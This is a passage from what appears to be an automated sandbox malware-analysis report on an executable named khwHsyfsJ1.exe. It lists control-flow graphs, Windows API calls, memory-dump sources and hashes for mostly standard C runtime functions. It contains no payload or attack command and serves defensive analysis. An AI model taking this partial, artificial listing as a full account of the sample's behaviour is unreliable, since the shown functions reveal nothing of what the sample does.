• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: ff2892ae21c298996cdedf83b98a22099581218a2784ced1c49fba8e290833e9
                                                                                                                                                                                                                                                          • Instruction ID: 787ca5d575ca8956f0b15fd39a931f3e4245b2526b5bd4fe411609dccd81fddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2892ae21c298996cdedf83b98a22099581218a2784ced1c49fba8e290833e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F101F73310AB155EFA2427BCBC85A2B2BD4EB017B472006B9FA24862E4EF594CC19260

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 366 b64424-b64438 GetLastError 367 b64446-b6444b 366->367 368 b6443a-b64444 call b65904 366->368 370 b6444d call b6480c 367->370 368->367 373 b6448f-b6449a SetLastError 368->373 372 b64452-b64458 370->372 374 b64463-b64471 call b6595a 372->374 375 b6445a 372->375 381 b64476-b6448d call b64296 call b64869 374->381 382 b64473-b64474 374->382 376 b6445b-b64461 call b64869 375->376 383 b6449b-b644a7 SetLastError call b63f24 376->383 381->373 381->383 382->376
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00B66D69,?,?,?,00B704C8,0000002C,00B63F34,00000016,00B6209F,00B61AFC), ref: 00B64428
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6445B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64483
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00B64490
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00B6449C
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00B644A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 390 b636fc-b63724 GetModuleHandleExW 391 b63726-b63739 GetProcAddress 390->391 392 b63749-b6374d 390->392 393 b6373b-b63746 391->393 394 b63748 391->394 395 b6374f-b63752 FreeLibrary 392->395 396 b63758-b63765 call b6123a 392->396 393->394 394->392 395->396
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B636AD,?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002), ref: 00B6371C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B6372F
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B636AD,?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000), ref: 00B63752
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 400 b6634d-b66372 call b63f72 403 b66374-b6637c 400->403 404 b6637f-b663a5 MultiByteToWideChar 400->404 403->404 405 b66444-b66448 404->405 406 b663ab-b663b7 404->406 407 b66454-b66469 call b6123a 405->407 408 b6644a-b6644d 405->408 409 b66403 406->409 410 b663b9-b663ca 406->410 408->407 412 b66405-b66407 409->412 413 b663e5-b663eb 410->413 414 b663cc-b663db call b6ac20 410->414 418 b6643d-b66443 call b6646a 412->418 419 b66409-b6642b call b620b0 MultiByteToWideChar 412->419 416 b663ec call b662ff 413->416 414->418 425 b663dd-b663e3 414->425 421 b663f1-b663f6 416->421 418->405 419->418 429 b6642d-b6643b GetStringTypeW 419->429 421->418 426 b663f8 421->426 428 b663fe-b66401 425->428 426->428 428->412 429->418
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00B654C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00B6639A
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B663D2
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B66423
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B66435
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B6643E
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1857427562-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 430 b6561e-b65633 GetEnvironmentStringsW 431 b65635-b65655 call b655e7 WideCharToMultiByte 430->431 432 b6568b 430->432 431->432 438 b65657 431->438 433 b6568d-b6568f 432->433 435 b65691-b65692 FreeEnvironmentStringsW 433->435 436 b65698-b656a0 433->436 435->436 439 b65658 call b662ff 438->439 440 b6565d-b65662 439->440 441 b65664-b65678 WideCharToMultiByte 440->441 442 b65680 440->442 441->442 444 b6567a-b6567e 441->444 443 b65682-b65689 call b64869 442->443 443->433 444->443
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B65627
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6564A
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B65670
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B65683
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B65692
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                          • Opcode ID: a715405126028da32b21225d056b358cc437572c62bc03137ee16c1de5a6acb0
                                                                                                                                                                                                                                                          • Instruction ID: 7c9a7c2573609d7628ca228bf15a92e578cabc2f2e396fa736c810029077b989
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a715405126028da32b21225d056b358cc437572c62bc03137ee16c1de5a6acb0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8001A772602A557F27311AB69C8DCBB6EBDDFC2BA075501A9FD04D3140EFA88C11C1B0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 447 b644a8-b644bf GetLastError 448 b644c1-b644cb call b65904 447->448 449 b644cd-b644d2 447->449 448->449 456 b6451e-b64525 SetLastError 448->456 451 b644d4 call b6480c 449->451 452 b644d9-b644df 451->452 454 b644e1 452->454 455 b644ea-b644f8 call b6595a 452->455 458 b644e2-b644e8 call b64869 454->458 463 b644fd-b64513 call b64296 call b64869 455->463 464 b644fa-b644fb 455->464 457 b64527-b6452c 456->457 465 b64515-b6451c SetLastError 458->465 463->456 463->465 464->458 465->457
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00B647FE,00B67E79,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD,?,00000000), ref: 00B644AD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B644E2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64509
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B64516
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B6451F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 4fb658fbe2a6972734c082a1c72372114840dc5a75618dd9031b1a77bf62d01f
                                                                                                                                                                                                                                                          • Instruction ID: 30474ad10a9cd66065bd1da8a1018a48fe3f9ab8fd3c9448bcea13ba28586c22
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb658fbe2a6972734c082a1c72372114840dc5a75618dd9031b1a77bf62d01f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101A976204E45A786226B356C96E2B16EDFBD177172041A5F51AD32D2EF6C8D414130

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 470 b66176-b66181 471 b66183-b6618b 470->471 472 b661dc-b661de 470->472 473 b66194-b6619d 471->473 474 b6618d-b66193 call b64869 471->474 476 b661a6-b661af 473->476 477 b6619f-b661a5 call b64869 473->477 474->473 480 b661b1-b661b7 call b64869 476->480 481 b661b8-b661c1 476->481 477->476 480->481 484 b661c3-b661c9 call b64869 481->484 485 b661ca-b661d3 481->485 484->485 485->472 486 b661d5-b661db call b64869 485->486 486->472
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6618E
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661C4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B661D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 4585ad6eb84c8d1d63463c2633c06ff490a0b53a7628783a73c8ed619eb8437b
                                                                                                                                                                                                                                                          • Instruction ID: 7b43f601577a50ee8f491ae1ab37a19497da42051f045af4b8f1f0164841f87b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4585ad6eb84c8d1d63463c2633c06ff490a0b53a7628783a73c8ed619eb8437b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F09032604600EF8660EF5DF982C1A77EDEA41B103681CA9F40EE7592CB3CFCC08A60
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DAD
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DBF
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DD2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DE3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63DF4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: a9284a69b836a526e45cad495bced11478422c38b59745af8aa10ba94fd6db60
                                                                                                                                                                                                                                                          • Instruction ID: 0d43788552d44a5842b18139a340eea245bbab918c13235422879e8686295765
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9284a69b836a526e45cad495bced11478422c38b59745af8aa10ba94fd6db60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0B7B9814660DB97656F2DFC024493BB0FB54B203454ABAF91AA76B1CF3909818EE1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\khwHsyfsJ1.exe,00000104), ref: 00B62F93
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6305E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B63068
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\khwHsyfsJ1.exe
                                                                                                                                                                                                                                                          • API String ID: 2506810119-1170798523
                                                                                                                                                                                                                                                          • Opcode ID: 14a32fd1df5710f3bf0b5bb4f9563727375d9e8f411f7040058e173c849922ad
                                                                                                                                                                                                                                                          • Instruction ID: dc4c011937a3a0a0c6e3caf98483b209be500db1a5126523328b0648788e8b80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14a32fd1df5710f3bf0b5bb4f9563727375d9e8f411f7040058e173c849922ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F314171A00658EFDB21DB99DC819AEBBFCEF85B10F1040A6F80497211DB798E44CB61
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B62594,00000000,?,00B71B50,?,?,?,00B62737,00000004,InitializeCriticalSectionEx,00B6BC48,InitializeCriticalSectionEx), ref: 00B625F0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00B62594,00000000,?,00B71B50,?,?,?,00B62737,00000004,InitializeCriticalSectionEx,00B6BC48,InitializeCriticalSectionEx,00000000,?,00B624C7), ref: 00B625FA
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B62622
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: 60b09f9f54b56913092c86aaed13a6ca7531ccf9826d17f0477c82a774351fda
                                                                                                                                                                                                                                                          • Instruction ID: 1e4518747c22b1bb355b36f353e418c40733aa9b82702c76645695994d955f8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b09f9f54b56913092c86aaed13a6ca7531ccf9826d17f0477c82a774351fda
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E04F30680704BBEF211B60EC06F5A3FA8FB10B91F144460F90DE80E1EBF9E9949B45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue), ref: 00B6580F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue,00B6C4D8,FlsSetValue,00000000,00000364,?,00B644F6), ref: 00B6581B
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B65784,00000000,00000000,00000000,00000000,?,00B65981,00000006,FlsSetValue,00B6C4D8,FlsSetValue,00000000), ref: 00B65829
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                          • Opcode ID: da6ab488c0769ea30f28147761a4605d826ce420d25be83c6ee81dbe990808af
                                                                                                                                                                                                                                                          • Instruction ID: 2cd6a99cc958730e74d1c21bb93cf02fd727492d6fea4412735c2879316334b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6ab488c0769ea30f28147761a4605d826ce420d25be83c6ee81dbe990808af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018432615726ABC7314A68AC44E577BE8EF057A1F200564F91AD7581DF68DC50C6E0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64A27
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: IsProcessorFeaturePresent.KERNEL32(00000017,00B6473C,00000000,?,00000004,00000000,?,?,?,?,00B64749,00000000,00000000,00000000,00000000,00000000), ref: 00B6474F
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00B64771
                                                                                                                                                                                                                                                            • Part of subcall function 00B6474D: TerminateProcess.KERNEL32(00000000), ref: 00B64778
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction ID: 2d0fe13b1067b95bbd90e9e7126ad442388290f6a34f68411b45e491eba2f998
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA519F75E40619EFDF14CFA8C881AAEBBF5EF58314F2481AAE454E7341E7399E018B50

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:16.3%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:15
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
